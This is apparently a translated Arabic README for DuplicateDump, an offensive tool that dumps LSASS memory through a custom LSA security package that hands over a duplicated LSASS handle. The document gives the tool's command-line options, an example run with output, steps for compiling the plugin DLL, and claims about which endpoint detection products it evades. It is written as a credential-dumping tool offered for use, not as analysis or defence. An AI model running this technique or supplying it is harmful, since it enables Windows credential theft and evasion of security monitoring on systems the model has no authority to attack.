
تفريغ LSASS باستخدام مقبض مكرر من إضافة LSA مخصصة
DuplicateDump هو فرع من MirrorDump مع التعديلات التالية:
يضيف DuplicateDump برنامج LSA plugin مخصص يقوم بنسخ مقبض عملية LSASS من عملية LSASS إلى DuplicateDump. وبالتالي، يكون لدى DuplicateDump مقبض عملية جاهز للاستخدام إلى LSASS دون استدعاء OpenProcess.
عن طريق تحميل DuplicateDump في الذاكرة، كان قادرًا على تفريغ ذاكرة LSASS دون اكتشاف على
تم اكتشافه بواسطة Cortex XDR، Crowdstrike. فشل في تفريغ lsass دون اكتشاف على SentinalOne.
قم بتجميع LSA plugin (تصدير إما دالة SpLsaModeInitialize أو dllMain) وقدم المسار الكامل لـ DLL إلى DuplicateDump
.\DuplicateDump.exe --help
-f, --filename=VALUE The path to write the dump file to
-p, --plugin=VALUE Full file path to LSA plugin
-c, --compress GZip and delete the dump file on disk
-d, --DebugPriv Obtain SeDebugPrivilege
-h, --help Display this help
مثال
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Loading LSA security package
[+] Named pipe connected and replying with current PID 6492
[+] Found duplicated LSASS process handle 0x3d0
[+] Compressed dump file saved to test.gz
يستخدم DuplicateDump DInvoke لاستدعاء API AddSecurityPackage لتحميل LSA plugin. يمكنك استخدام استدعاء RPC دون الحاجة إلى استدعاء API مباشرة. راجع التفاصيل في منشور مدونة XPN
مؤخرًا، اكتشف splinter_code أنه يمكن الاستفادة من SecLogon لتفريغ LSASS. نوصي بشدة بدراسة منشور مدونته.